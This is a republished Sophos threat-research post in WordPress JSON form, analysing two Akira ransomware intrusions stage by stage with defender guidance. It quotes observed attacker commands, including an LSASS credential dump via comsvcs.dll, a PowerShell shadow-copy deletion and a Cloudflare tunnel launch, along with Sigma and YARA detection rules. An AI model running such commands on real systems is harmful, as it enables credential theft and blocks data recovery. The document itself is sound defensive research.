{"id":21973,"date":"2023-05-11T09:46:25","date_gmt":"2023-05-11T17:46:25","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2023\/05\/11\/news-15704\/"},"modified":"2023-05-11T09:46:25","modified_gmt":"2023-05-11T17:46:25","slug":"news-15704","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2023\/05\/11\/news-15704\/","title":{"rendered":"Akira Ransomware is \u201cbringin\u2019 1988 back\u201d"},"content":{"rendered":"<p><strong>Credit to Author: gallagherseanm| Date: Tue, 09 May 2023 20:27:03 +0000<\/strong><\/p>\n<div class=\"entry-content lg:prose-lg mx-auto prose max-w-4xl\">\n<p>On April 6, 2023, the Sophos Incident Response team was engaged to support a ransomware victim organization in North America. The following week on April 12, 2023, yet another North American organization contacted Sophos for assistance.<\/p>\n<p>While the incidents appeared to be the work of two different criminal actors, both deployed a recently emerged ransomware called Akira. In both cases, the affected organizations had files encrypted with the \u201c.akira\u201d extensions and had nearly identical ransom note files, named fn.txt, dropped in the process (as shown below in Figure 1].<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira1.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-91586\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira1.png\" alt=\"\" width=\"640\" height=\"346\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira1.png 1426w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira1.png?resize=300,162 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira1.png?resize=768,415 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira1.png?resize=1024,553 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 1: &#8220;fn.txt\u201d ransomware notice<\/em><\/p>\n<p>This Akira ransomware bears no code similarity to a<a href=\"https:\/\/www.enigmasoftware.com\/akiraransomware-removal\/\"> previous ransomware<\/a> strain with the same name that was active in 2017 and is likely unrelated. The new jQuery-based leak site (Figure 2), with its retro green colors, has garnered most of the attention, as it accepts commands instead of listing out information.<\/p>\n<p class=\"jetpack-slideshow-noscript robots-nocontent\">This slideshow requires JavaScript.<\/p>\n<div id=\"gallery-91570-1-slideshow\" class=\"jetpack-slideshow-window jetpack-slideshow jetpack-slideshow-black\" data-trans=\"fade\" data-autostart=\"1\" data-gallery=\"[{&quot;src&quot;:&quot;https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/akira2.png&quot;,&quot;id&quot;:&quot;91587&quot;,&quot;title&quot;:&quot;akira2&quot;,&quot;alt&quot;:&quot;Screenshot of Akira ransomware leak site.&quot;,&quot;caption&quot;:&quot;Figure 2a. Screenshot of the Akira ransomware leak site.&quot;,&quot;itemprop&quot;:&quot;image&quot;},{&quot;src&quot;:&quot;https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/akira3.png&quot;,&quot;id&quot;:&quot;91589&quot;,&quot;title&quot;:&quot;akira3&quot;,&quot;alt&quot;:&quot;Screenshot of Akira leaks website.&quot;,&quot;caption&quot;:&quot;Figure 2b. A pop-up window from the Akira leak site.&quot;,&quot;itemprop&quot;:&quot;image&quot;}]\" itemscope itemtype=\"https:\/\/schema.org\/ImageGallery\"><\/div>\n<p>&nbsp;<\/p>\n<p>However, cool as their leak site design may be, this matters none to victims of this ransomware, which regrettably includes a <a href=\"https:\/\/twitter.com\/AlvieriD\/status\/1651245999350792202\">daycare service in Canada<\/a>. While the total number of victim organizations (Figure 3) are still relatively small in comparison to Lockbit or BlackCat\/APLHV, that is how all new ransomware families begin.<\/p>\n<figure id=\"attachment_91591\" aria-describedby=\"caption-attachment-91591\" style=\"width: 640px\" class=\"wp-caption alignnone\"><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira-attacks.png\"><img decoding=\"async\" loading=\"lazy\" class=\"size-full wp-image-91591\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira-attacks.png\" alt=\"Bar chart showing number of ransomware leak postings per day over the past two weeks\" width=\"640\" height=\"360\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira-attacks.png 1200w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira-attacks.png?resize=300,169 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira-attacks.png?resize=768,432 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira-attacks.png?resize=1024,576 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><figcaption id=\"caption-attachment-91591\" class=\"wp-caption-text\">Figure 3: Timeline analysis of Akira victims<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p>In this blog post, we will compare two separate incident attack flows, illustrating how different threat actors are deploying Akira ransomware. Please note that available data on the second incident is limited, but we are highlighting deviations between the two incidents. This information will provide organizations with detailed guidance on what they need to defend against to protect their businesses.<\/p>\n<h1><\/h1>\n<h2><strong>Attack Flow Details<\/strong><\/h2>\n<h2><strong>Initial Access<\/strong><\/h2>\n<h3><strong>Incident #1<\/strong><\/h3>\n<p>A user account purposedly configured to allow for Multi-Factor Authentication (MFA) bypass.<\/p>\n<p>[T1078 \u2013 Valid Accounts] [T1133 \u2013 External Remote Service]<\/p>\n<ul>\n<li>External IP access from the threat actor was routed through European TOR VPN exit nodes.<\/li>\n<\/ul>\n<h3><strong>Incident #2<\/strong><\/h3>\n<p>VPN access using Single Factor authentication.<\/p>\n<p>[T1078 \u2013 Valid Accounts] [T1133 \u2013 External Remote Service]<\/p>\n<h3><strong>Guidance<\/strong><\/h3>\n<p>Replacing password-only authentication with MFA remains one of the highest return-on-investment (ROI) security controls, however special attention must be given to auditing for any accounts with bypass exceptions. Also, its recommended that organizations block any inbound traffic from TOR networks where perimeter controls are available.<\/p>\n<h2><strong>Credential Access<\/strong><\/h2>\n<h3><strong>Incident #1<\/strong><\/h3>\n<p>Minidump of LSASS process memory leveraging comsvcs.dll with proxy execution by rundll32.exe.<\/p>\n<p>[T1003.001 &#8211; OS Credential Dumping: LSASS Memory] [T1569 &#8211; System Services]<\/p>\n<pre>Service Name: TcwvBcuf    Action: %COMSPEC% \/Q \/c cmD.Exe \/Q \/c for \/f \"\"tokens=1,2 delims= \"\" ^%A in ('\"\"tasklist \/fi \"\"Imagename eq lsass.exe\"\" | find \"\"lsass\"\"\"\"')   do rundll32.exe C:windowsSystem32comsvcs.dll, #+0000^24 ^%B WindowsTempFP4.docx full\"<\/pre>\n<ul>\n<li>The use of a .docx extension is not as common as .dmp or .txt<\/li>\n<li>The service name is a random eight characters and different strings were observed across different systems.<\/li>\n<\/ul>\n<p>Credential access activity also occurred over the network, as this Sophos endpoint detection indicates:<\/p>\n<pre>'Creds_4h (T1003.002)' malicious behaviour detected in 'C:WindowsSystem32svchost.exe'<\/pre>\n<h3><strong>Incident #2<\/strong><\/h3>\n<p>While execution details are limited, multiple systems had the file <strong><em>C:WindowsMEMORY.DMP<\/em><\/strong> created prior to ransomware execution correlating with Windows event log data.<\/p>\n<p>[T1003.001 &#8211; OS Credential Dumping: LSASS Memory] [T1569 &#8211; System Services]<\/p>\n<pre>[4656 \/ 0x1230] Source Name: Microsoft-Windows-Security-Auditing Strings: ['S-1-5-18\u2019 \u2018&lt;Redacted&gt;$'\u00a0 ' Redacted&gt;'\u00a0 '0x00000000000003e7'\u00a0   'Security'\u00a0 'Process'\u00a0 'DeviceHarddiskVolume3WindowsSystem32lsass.exe'\u00a0 '0x0000000000000524'\u00a0 '{00000000-0000-0000-0000-000000000000}'\u00a0   '%%4490\u00a0\u00a0\u00a0 %%4492\u00a0\u00a0\u00a0 '\u00a0 '-'\u00a0 '0x00001400'\u00a0 '-'\u00a0 '0'\u00a0 '0x0000000000001318'\u00a0 'C:WindowsSystem32WindowsPowerShellv1.0powershell.exe'\u00a0 '-']<\/pre>\n<h3><strong>Guidance<\/strong><\/h3>\n<p>Dumping process memory to obtain credentials is a pervasive technique observed in most ransomware incidents. Aside from ensuring full coverage of your endpoint agent, special care should be taken to segment domain admin accounts from workstation admin accounts to reduce the impact of credential dumping when it does occur. This is also a great candidate for a repeatable hunt, using a structured method to look for variations in the pre- and post-dumping activity that may have bypassed your existing detections. Listed below is a Sigma rule that can be used by defenders to detect or hunt on the credential access technique used above.<\/p>\n<pre>title: Using the Minidump function of comsvcs.dll  description: The minidump function of comsvcs.dll can be used to dump lsass.exe. The function requires the PID of lsass.exe. In addition, the Minidump function can be called using #24 rather than its name.  author: Sophos MDR  logsource:     category: process_creation     product: windows  detection:\u00a0\u00a0\u00a0\u00a0\u00a0  \u00a0\u00a0\u00a0 selection:  \u00a0\u00a0\u00a0\u00a0\u00a0 Image|endswith:  \u00a0\u00a0\u00a0\u00a0\u00a0 - \\sc.exe  \u00a0\u00a0\u00a0\u00a0\u00a0 - \\cmd.exe  \u00a0\u00a0\u00a0\u00a0\u00a0 - \\powershell.exe  \u00a0\u00a0\u00a0 command_line_filter:  \u00a0\u00a0\u00a0\u00a0\u00a0 CommandLine|re: .*comsvcs.*(minidump|#24).*  \u00a0\u00a0\u00a0 condition: selection AND command_line_filter     falsepositives:          - Penetration testing      level: high      tags:         - attack.credential access #TA0006         - attack.T1003.001<\/pre>\n<h2><strong>\u00a0<\/strong><\/h2>\n<h2><strong>Discovery<\/strong><\/h2>\n<h3><strong>Incident #1<\/strong><\/h3>\n<p>Conducting discovery indirectly via schedule tasks named \u201cWindows Update\u201d performing remote directory listings.<\/p>\n<p>[T1083 &#8211; File and Directory Discovery] [T1053.005 &#8211; Scheduled Task\/Job: Scheduled Task]<\/p>\n<pre>C:&gt;type c:programdataHPms.bat    dir \"\"\\10.1.100.64c$ProgramData\"\" &gt;&gt; C:programdataHPsvr_dir.txtt\"    <\/pre>\n<p>Leveraging a dual-use tool, PCHunter64, to acquire detailed process and system information.<\/p>\n<p>[T1082 &#8211; System Information Discovery] [T1105 &#8211; Ingress Tool Transfer]<\/p>\n<pre>URL: :2023040620230407: administrator@https:\/\/www.google[.]com\/url?esrc=s&amp;q=&amp;rct=j&amp;sa=U&amp;url=https:\/\/m.majorgeeks[.]com\/files\/details\/pc_hunter.html Access count: 1    URL: Visited: administrator@hXXps:\/\/temp[.]sh\/PewtN\/PCHunter64.exe Access count: 9<\/pre>\n<ul>\n<li>The threat actor initially searched online for the tool before staging it for future downloads using a public cloud hosting service.<\/li>\n<\/ul>\n<h3><strong>Incident #2<\/strong><\/h3>\n<p>Utilization of a dual-use tool, Advanced IP Scanner, to discover other systems and networks.<\/p>\n<p>[T1018 &#8211; Remote System Discovery]<\/p>\n<pre>Prefetch [ADVANCED_IP_SCANNER_2.5.4594.] was executed - run count 2 hash: 0xC2980947 volume: 1 [serial number: 0x22E2CC6E  \u00a0 device path: VOLUME{01d89216e27acb2f-22e2cc6e}]    Employing an existing IT tool, LANSweeper, to access detailed network and system information.    [T1018 - Remote System Discovery] [T1087 - Account Discovery: Domain Account]    Visited: &lt;redacted&gt;@file:\/\/\/C:\/ProgramData\/AdComputers.csv    Visited: &lt;redacted&gt;@file:\/\/\/C:\/ProgramData\/AdSubnets.csv    Visited: &lt;redacted&gt;@file:\/\/\/C:\/ProgramData\/AdOUs.csv    Visited: &lt;redacted&gt;@file:\/\/\/C:\/ProgramData\/AdUsers.csv    URL F[:]\/IT\/Backups\/Database\/LANSweeper%20SQL+Key\/Encryption.txt<\/pre>\n<ul>\n<li>The threat actor accessed the decryption key to facilitate gaining reconnaissance information without doing any noisy discovery scanning.<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<h3><span style=\"font-size: 1em\"><span style=\"font-family: SophosSansSemibold, Helvetica Neue, Helvetica, Arial, sans-serif\"><b>Guidance<\/b><\/span><\/span><\/h3>\n<p><span style=\"font-size: 1em\">Understanding the intention of a dual-use tool being executed is challenging; however, it\u2019s best practice to document which tools are approved for corporate use and block all others by default until they can be reviewed. This has the added benefit of reducing shadow IT risk as well. Additionally, just like high value business data, access to both the tool and the output of vulnerability scanners and asset discovery applications should be restricted and audited. We have also included an example Sigma detection rule for the activity shown in incident #1.<\/span><\/p>\n<pre>title: Listing Directories of Remote Hosts    description: Threat actors can use windows binaries and commands to discover interesting to them directories on remote hosts and redirect the output to a file on disc for later consumption.    author: Sophos MDR    logsource:      category: process_creation      product: windows  detection:     selection:       Image|endswith:          - 'cmd.exe'          - 'powershell.exe'       CommandLine|contains:         - 'dir *\\*c$*&gt;&gt;'         - 'ls *\\*c$*&gt;&gt;'       filter:         ParentImage|endswith:         - 'java.exe'       condition: selection and not filter    falsepositives:        - Possible from admin activity    level: high    tags:       - attack.discovery #TA0007       - attack.T1083    <strong>\u00a0<\/strong><\/pre>\n<h2><strong>Lateral Movement<\/strong><\/h2>\n<h3><strong>Incident #1<\/strong><\/h3>\n<p>There were no network restrictions on Remote Desktop Protocol (RDP), and the threat actor was able to move freely across the network; as a result, this activity was captured by multiple event types.<\/p>\n<pre>Event ID [1149] - RDP connection established  Event ID [1149]\u00a0\u00a0\u00a0\u00a0\u00a0 RDP from from IP: &lt;Redacted&gt;  Event ID: 25 - Remote Desktop Services: Session reconnection succeeded  Event ID: 24 - Remote Desktop Services: Session has been disconnected  Event ID [4624]\u00a0\u00a0\u00a0\u00a0\u00a0 RDP Type \"3\" from IP: &lt;Redacted&gt; - Device: &lt;Redacted&gt;  [HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers&lt;Redacted&gt;] Username hint: &lt;Redacted&gt;  \"&lt;Provider Name=\"\"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS\"\" Guid=\"\"{1139C61B-B549-4251-8ED3-27250A1EDEC8}\"\" \/&gt;  &lt;EventID&gt;131&lt;\/EventID&gt;  &lt;Version&gt;0&lt;\/Version&gt;  &lt;Level&gt;4&lt;\/Level&gt;  &lt;Task&gt;4&lt;\/Task&gt;  &lt;Opcode&gt;15&lt;\/Opcode&gt;  &lt;Keywords&gt;0x4000000000000000&lt;\/Keywords&gt;  &lt;TimeCreated SystemTime=\"\"2023-04-06T09:23:41.969586500Z\"\" \/&gt;  &lt;EventRecordID&gt;633&lt;\/EventRecordID&gt;  &lt;Correlation ActivityID=\"\"{F4208FE1-4D5D-45DF-B8E2-A851AC3F0000}\"\" \/&gt;  &lt;Execution ProcessID=\"\"1136\"\" ThreadID=\"\"2228\"\" \/&gt;  &lt;Channel&gt;Microsoft-Windows-RemoteDesktopServices-RdpCoreTS\/Operational&lt;\/Channel&gt;  &lt;Computer&gt; &lt;Redacted&gt; &lt;\/Computer&gt;  &lt;Security UserID=\"\"S-1-5-20\"\" \/&gt;  &lt;\/System&gt;  &lt;EventData&gt;  &lt;Data Name=\"\"ConnType\"\"&gt;TCP&lt;\/Data&gt;  &lt;Data Name=\"\"ClientIP\"\"&gt; &lt;Redacted&gt;:56736&lt;\/Data&gt;  &lt;\/EventData&gt;  &lt;\/Event&gt;\"<\/pre>\n<p>&nbsp;<\/p>\n<h3><strong>Incident #2<\/strong><\/h3>\n<p>Similar to Incident #1, the threat actor was able to RDP unencumbered across the organization&#8217;s infrastructure.<\/p>\n<h3><strong>Guidance<\/strong><\/h3>\n<p>Securing RDP access can be difficult for many companies, but it is a project worthy of investment. The first item to check off the box is to restrict by role, which accounts can access other systems using RDP. The overwhelming majority of users do not need this access. Secondly, adopting a centralized jump server, which only admins can access with MFA and blocking at the network level other system to system RDP is a strong preventative control. Lastly, a detection should be in place to promptly review anomalous RDP connections to deconflict them with approved system administration activity.<\/p>\n<p>&nbsp;<\/p>\n<h2><strong>Defense Evasion<\/strong><\/h2>\n<h3><strong>Incident #1<\/strong><\/h3>\n<p>The threat actor executed two actions to bypass Windows Defender<\/p>\n<p>[T1562.001 &#8211; Impair Defenses: Disable or Modify Tools]<\/p>\n<pre>5001 - Real-time Protection was disabled  New Value\"&gt;HKLMSOFTWAREMicrosoftWindows DefenderExclusionsPathsC:    <\/pre>\n<h3><strong>Guidance<\/strong><\/h3>\n<p>The first line of defense available to organizations is to use a security agent that has robust tamper protection. In terms of monitoring for this activity, these are detection-ready event sources. While its possible a system administrator would make such exceptions during troubleshooting, given the risk of this activity, it&#8217;s something that should be investigated promptly if a corresponding support ticket isn\u2019t found.<\/p>\n<p>&nbsp;<\/p>\n<h2><strong>Command and Control<\/strong><\/h2>\n<h3><strong>Incident #1<\/strong><\/h3>\n<p>During this incident, the threat actor leveraged one of the most popular dual-use agents, <strong>AnyDesk<\/strong>, to provide persistent remote access into the affected organization on multiple systems.<\/p>\n<p>[T1219 &#8211; Remote Access Software]<\/p>\n<pre>UserAssist entry: 86 Value name: C:Usersadministrator.&lt;Redacted&gt; AppDataLocalMicrosoftWindowsINetCacheIE14J9H2AAAnyDesk.exe   Count: 1  Event ID [7045] \"Service Name: Anydesk\" \"C:Program Files (x86)AnyDeskAnyDesk.exe\"\" --service\"  Prefetch [ANYDESK.EXE] was executed - run count 9 path: PROGRAM FILES (X86)ANYDESKANYDESK.EXE hash: 0x389EE9E9 volume: 1   [serial number: 0x7077BC2C\u00a0 device path: VOLUME{01cf89bc76f2a351-7077bc2c}]<\/pre>\n<p>&nbsp;<\/p>\n<p><strong>Incident #2<\/strong><\/p>\n<p>The threat actor almost immediately installed Cloudflare\u2019s freely available tunnelling software here, C<strong><em>:ProgramDatawindows_update.exe<\/em><\/strong>, followed by the download and execution of another dual-use agent, <strong>Radmin<\/strong><\/p>\n<p>[T1572 &#8211; Protocol Tunneling ] [T1219 &#8211; Remote Access Software]<\/p>\n<pre>C:programdatawindows_update.exe tunnel run --token eyJhIjoiODllZDkxZjgyNWE3ZGM3NGY4ZmRlMTc2MWY3ZDcwMWMiLCJ0IjoiMTUwMGIxMGEtZjM3My00ZmJlLTk  4ZTYtODgwMDMxYzE1M2VkIiwicyI6IlpURmtZV0V6TUdFdFpETXlOeTAwT0dRNUxUazNaakF0T1RsbVpESmxabU0yWVRWaCJ9    hxxps:\/\/download[.]radmin[.]com\/download\/files\/Radmin_3.5.2.1_EN[.]zip (Radmin_3.5.2.1_EN.zip)<\/pre>\n<ul>\n<li>A feature of Advanced IP Scanner is integration with Radmin to provide remote access to scanned systems<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<h3><strong>Guidance<\/strong><\/h3>\n<p>Just as with the discovery activity, threat actor usage of dual-use agents is both commonplace and important to disrupt. All non-approved remote access solutions should be blocked by default by an application control capability. Aside from allowing command and control (C2) and data exfiltration opportunities for an attacker, there is also a latent risk of the software itself having vulnerabilities and being unpatched because it&#8217;s not being managed by IT.<\/p>\n<h2><strong>Collection<\/strong><\/h2>\n<h3><strong>Incident #2<\/strong><\/h3>\n<p>A confirmed compromised account was used to download the WinRar archiving software and several files were staged for possible, but unconfirmed exfiltration<\/p>\n<p>[T1560.001 &#8211; Archive Collected Data: Archive via Utility]<\/p>\n<pre>URL Visited: hxxps:\/\/notifier.rarlab[.]com\/?language=English&amp;source=RARLAB&amp;landingpage=first&amp;version=621&amp;architecture=64  Userassist 2023-03-15T10:15:55Z C:Users&lt;Redacted&gt;Downloadswinrar.exe  Userassist 2023-03-15T11:04:42Z C:ProgramDatawinrar.exe  URL Visited: E:\/&lt;Redacted&gt;Dept.rar  URL Visited: E:\/&lt;Redacted&gt;Channel.rar    <\/pre>\n<h3><strong>Guidance<\/strong><\/h3>\n<p>Often by the time a threat actor is staging data, it&#8217;s too late to have a good security outcome. A good approach to prevent theft of data is to adopt least privilege access, which means ensuring only the required people have access, followed by granular controls on exporting, sharing, or moving the files. DLP solutions, while having a history of being difficult to implement and maintain, are worth evaluating for high-risk data.<\/p>\n<h2><strong>Impact<\/strong><\/h2>\n<h3><strong>Incident #1<\/strong><\/h3>\n<p><strong><em>C:ProgramDataUpdate.bat<\/em><\/strong> file executed the ransomware binary <strong><em>dllhost32.exe<\/em><\/strong>, which is detected as <strong>Troj\/Ransom-GWA<\/strong> by Sophos (Figure 4)<\/p>\n<p>[T11486 &#8211; Data Encrypted for Impact] [T1490 &#8211; Inhibit System Recovery]<\/p>\n<pre>dllhost32.exe -n=10 -s=C:ESDsharez.txt    dllhost32.exe -n=1 -s=C:program filessharez.txt    powershell.exe -Command \"Get-WmiObject Win32_Shadowcopy | Remove-WmiObject\"<\/pre>\n<ul>\n<li>\u2013n option is for encryption percentage, the attacker used different settings during the incident<\/li>\n<li>-s option is for \u2013share_file, there is a \u2013p option for \u2013encryption_path<\/li>\n<li>Removing the shadow copies prevents recovery using native Window\u2019s features and Sophos detects this as <strong>Impact_6a<\/strong>.<\/li>\n<li>Creates the <strong><em>C:fn.txt<\/em><\/strong> or <strong><em>C:etcfn.txt<\/em><\/strong> ransom note when complete<\/li>\n<li>Dwell time of 7 days before executing ransomware<\/li>\n<\/ul>\n<p>On endpoints protected with Sophos the following detections triggered:<\/p>\n<pre>CryptoGuard detected ransomware in C:ProgramDatadllhost32.exe  'Cleanup_1a (T1486)' malicious behavior detected in 'C:ProgramDatadllhost32.exe'      <\/pre>\n<p class=\"jetpack-slideshow-noscript robots-nocontent\">This slideshow requires JavaScript.<\/p>\n<div id=\"gallery-91570-2-slideshow\" class=\"jetpack-slideshow-window jetpack-slideshow jetpack-slideshow-black\" data-trans=\"fade\" data-autostart=\"1\" data-gallery=\"[{&quot;src&quot;:&quot;https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira5.jpg&quot;,&quot;id&quot;:&quot;91596&quot;,&quot;title&quot;:&quot;Akira5&quot;,&quot;alt&quot;:&quot;&quot;,&quot;caption&quot;:&quot;Figure 4: Sophos Central Attack Graph&quot;,&quot;itemprop&quot;:&quot;image&quot;},{&quot;src&quot;:&quot;https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira6.png&quot;,&quot;id&quot;:&quot;91597&quot;,&quot;title&quot;:&quot;Akira6&quot;,&quot;alt&quot;:&quot;&quot;,&quot;caption&quot;:&quot;Figure 4: Sophos Central Attack Graph&quot;,&quot;itemprop&quot;:&quot;image&quot;}]\" itemscope itemtype=\"https:\/\/schema.org\/ImageGallery\"><\/div>\n<p>&nbsp;<\/p>\n<p><em>\u00a0<\/em><\/p>\n<h3><strong>Incident #2<\/strong><\/h3>\n<p>Ransomware binary <strong><em>C:ProgramDatahpupdate.exe<\/em><\/strong> is executed and detected as <strong>Troj\/Ransom-GWG<\/strong> by Sophos<\/p>\n<p>[T11486 &#8211; Data Encrypted for Impact] [T1490 &#8211; Inhibit System Recovery]<\/p>\n<ul>\n<li>Creates the <strong><em>C:fn.txt<\/em><\/strong> ransom note when complete<\/li>\n<li>Dwell time of 30+ days before executing ransomware<\/li>\n<\/ul>\n<p>As previously reported by <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/meet-akira-a-new-ransomware-operation-targeting-the-enterprise\/\">Bleeping Computer<\/a>,\u00a0 Akira targets 26 specific file extensions for encryption. These extensions are predominantly related to databases, but also include targeting of virtual memory and disk images. Notably, it it does not target PDFs or typical Microsoft Office file types:<\/p>\n<p>&nbsp;<\/p>\n<p>SophosLabs researchers have also confirmed which file extensions are avoided by Akira in order to not impact system stability.<\/p>\n<figure id=\"attachment_91598\" aria-describedby=\"caption-attachment-91598\" style=\"width: 412px\" class=\"wp-caption alignnone\"><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira7.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"wp-image-91598 size-full\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira7.jpg\" alt=\"\" width=\"412\" height=\"232\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira7.jpg 412w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira7.jpg?resize=300,169 300w\" sizes=\"auto, (max-width: 412px) 100vw, 412px\" \/><\/a><figcaption id=\"caption-attachment-91598\" class=\"wp-caption-text\">Figure 5: File types excluded by Akira<\/figcaption><\/figure>\n<h3><strong>Guidance<\/strong><\/h3>\n<p>As mentioned earlier, at this late stage in the attack, having full coverage on all systems with a properly configured XDR solution is vital to protect organizations from ransomware. In the case of Sophos, it&#8217;s critical for customers to have their CryptoGuard policy activated, which is something support can guide customers on. We have also provided the YARA rule below, which can be used to identify Akira ransomware binaries.<\/p>\n<pre>rule ecrime_AKIRA_strings {  meta:       id = \"8c59c35d-8fb8-4644-9fa4-ce05b30e91c3\"       version = \"1.0\"       author = \"Paul Jaramillo\"       intrusion_set = \"AKIRA\"       description = \"Detects common strings\"       source = \"PE binaries\"       creation_date = \"2023-05-03\"       modification_date = \"2023-05-09\"       classification = \"TLP:CLEAR\"  strings:       $s1 = \".akira\" ascii nocase       $s2 = \"akira_readme.txt\" ascii nocase       $s3 = \".onion\" ascii nocase       $s4 = \/\\akira\\asio\\include\\asio\\impl\\co_spawn.hpp\/       $s5 = \/MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAylJbjtFvzHapC\/  condition:      (filesize&gt;250KB and filesize&lt;1MB) and      uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x4550 and      (($s1 and $s2 and $s3) or      $s4 or $s5)  }<\/pre>\n<p>Please be aware that threat actors will continue to modify the code, which was evident when we uncovered the following new file name being used \u201c<strong>readme-asldkas.txt<\/strong>\u201d.<\/p>\n<h1><strong>Conclusion<\/strong><\/h1>\n<p>Sophos MDR is sharing this information with the specific goal of aiding defenders in the seemingly never-ending battle with ransomware threat groups. Through each of the covered steps in the attack flow, specific guidance is provided to drive actions with context. Aside from the differences in C2 tools used (AnyDesk vs Cloudflared), one of the key points to highlight is the dwell time. Incident #1 had a dwell time of 7 days compared to incident #2 with over 30 days of dwell time. Both of these events demonstrate a slower operational tempo, which bodes well for defenders having opportunities to disrupt in-flight compromises. The time from initial access to ransomware impact is indicative of the complex e-crime ecosystem, where there are distributors, initial access brokers, malware developers, and ransomware affiliates working together from resource development to payment. Unfortunately, there are some edge cases where organizations have had their files encrypted within just 24 hours, and that type of threat really does require an experienced, global partner, such as Sophos, to augment your security program.<\/p>\n<p>&nbsp;<\/p>\n<h4>Acknowledgements<\/h4>\n<p>Sophos would like to acknowledge the contributions of Melisa Kelly, Jason Jenkins, Anand Ajjan, Steeve Gaudreault, Kostas Tsialemis, and Sean Gallagher this report.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/news.sophos.com\/en-us\/2023\/05\/09\/akira-ransomware-is-bringin-88-back\/\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/sophos\/dgdY<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/shutterstock_2228563287-1.jpg\"\/><\/p>\n<p><strong>Credit to Author: gallagherseanm| Date: Tue, 09 May 2023 20:27:03 +0000<\/strong><\/p>\n<p>A new recently observed ransomware family dubbed Akira uses a retro aesthetic on their victim site very reminiscent of the 1980s green screen consoles and possibly takes its namesake from the popular 1988 anime film of the same name.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10378,10377],"tags":[29351,129,12657,3765,24552,24815,16771],"class_list":["post-21973","post","type-post","status-publish","format-standard","hentry","category-security","category-sophos","tag-akira","tag-featured","tag-incident-response","tag-ransomware","tag-security-operations","tag-sophos-xdr","tag-threat-research"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/21973","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=21973"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/21973\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=21973"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=21973"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=21973"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}